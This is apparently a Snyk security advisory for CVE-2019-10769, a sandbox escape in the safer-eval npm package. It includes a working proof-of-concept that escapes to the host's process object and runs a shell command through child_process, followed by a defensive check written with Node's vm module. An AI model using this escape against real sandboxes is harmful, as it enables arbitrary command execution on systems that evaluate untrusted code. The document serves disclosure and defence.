Arbitrary Code Execution Affecting safer-eval package, versions *
Threat Intelligence
Exploit Maturity: Proof of concept
EPSS: 0.86% (83rd percentile)
- Snyk ID SNYK-JS-SAFEREVAL-534901
- published 6 Dec 2019
- disclosed 6 Dec 2019
- credit Jonathan Leitschuh
Introduced: 6 Dec 2019
CVE-2019-10769
How to fix?
A fix was pushed into the master branch but not yet published.
Overview
safer-eval is a safer approach for eval in node and browser.
Affected versions of this package are vulnerable to Arbitrary Code Execution via generating a RangeError: Maximum call stack size exceeded.
PoC by Jonathan Leitschuh
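    const saferEval = require('safer-eval');

    const theFunction = function () {
      const f = Buffer.prototype.write;
      // Stand-in `this` object passed to Buffer.prototype.write below.
      const ft = {
        length: 10,
        utf8Write() {
        }
      };
      // Recurse until the stack overflows, then unwind i frames and call f
      // with almost no stack left; an error thrown there is returned.
      function r(i) {
        var x = 0;
        try {
          x = r(i);
        } catch (e) {}
        if (typeof (x) !== 'number')
          return x;
        if (x !== i)
          return x + 1;
        try {
          f.call(ft);
        } catch (e) {
          return e;
        }
        return null;
      }
      var i = 1;
      // Retry at increasing depths until r(i) returns an error object.
      while (1) {
        try {
          i = r(i).constructor.constructor("return process")();
          break;
        } catch (x) {
          i++;
        }
      }
      return i.mainModule.require("child_process").execSync("id").toString()
    };
    const untrusted = `(${theFunction})()`;
    console.log(saferEval(untrusted));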
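
The PoC's step `r(i).constructor.constructor("return process")()` only succeeds when the caught error belongs to the host realm rather than the sandbox. The following is an added example, not code from the advisory or the safer-eval project: it uses Node's vm module as a stand-in sandbox to check which realm a value leads back to. The names realmOf, processVisibleTo and hostLeaks are hypothetical and the sample values are constructed.

```javascript
const vm = require('vm');

// Stand-in sandbox: a fresh V8 context with its own Function constructor.
const sandbox = vm.createContext();
const sandboxFunction = vm.runInContext('Function', sandbox);

// Classify which realm a value leads back to through
// value.constructor.constructor, the property walk the PoC performs.
function realmOf(value) {
  // Primitives are boxed by whichever realm touches them, so they carry none.
  if (Object(value) !== value) return 'primitive';
  let ctor;
  try {
    ctor = value.constructor && value.constructor.constructor;
  } catch (e) {
    return 'unknown'; // throwing getter or proxy trap
  }
  if (ctor === Function) return 'host';
  if (ctor === sandboxFunction) return 'sandbox';
  return 'unknown';
}

// Whether code compiled by the given Function constructor can see `process`.
function processVisibleTo(fn) {
  return fn('return typeof process')() !== 'undefined';
}

// Keys of `exposed` whose values would hand untrusted code the host realm.
function hostLeaks(exposed) {
  return Object.keys(exposed).filter((key) => realmOf(exposed[key]) === 'host');
}

// Constructed sample values, not taken from safer-eval.
const exposed = {
  errorFromSandbox: vm.runInContext('new RangeError("constructed")', sandbox),
  errorFromHost: new RangeError('constructed'),
  bufferWrite: Buffer.prototype.write,
  plainNumber: 42,
};

console.log(hostLeaks(exposed));
console.log(processVisibleTo(sandboxFunction), processVisibleTo(Function));
```

Node's documentation states that the vm module is not a security mechanism, so a check like this belongs in a sandbox's regression tests and not as its only barrier.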
CVSS Scores
version 3.1